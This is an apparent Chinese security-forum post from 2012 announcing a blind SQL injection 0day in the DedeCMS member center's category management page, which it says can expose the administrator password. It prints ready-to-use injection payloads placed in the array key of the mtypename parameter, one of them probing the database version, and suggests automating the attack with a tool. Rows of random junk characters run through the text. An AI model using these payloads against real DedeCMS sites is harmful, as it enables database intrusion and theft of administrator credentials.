中国网络渗透测试联盟
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
[打印本页]
作者:
admin
时间:
2012-12-20 08:08
标题:
DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码
需要magic_quotes_gpc = Off,所以说是鸡肋啊.
- ?% h( r9 x8 n8 J. r
) [- @! y5 ~/ U3 T) M3 |2 l" \) [
' ^. ~& y Z5 ?% k% R
发生在数组key里的注射漏洞,有点意思.
6 o; ^4 Q* Y3 h0 e
5 [+ T$ _8 O* K7 L: l, Y9 k
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
& L) d V& @) ~" L
9 P2 y- y2 y3 z3 _
http://www.xxx.com
/dede/member/mtypes.php?dopost=save
9 _) X% k7 @# l3 B
7 U9 R/ P; d) W, ^$ d( A9 ^
exploit:
) U9 G+ b" G1 X' h k% B
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
# B( R/ ^5 `) q; M7 o1 ]
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
. U7 _6 X# P2 P- h
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2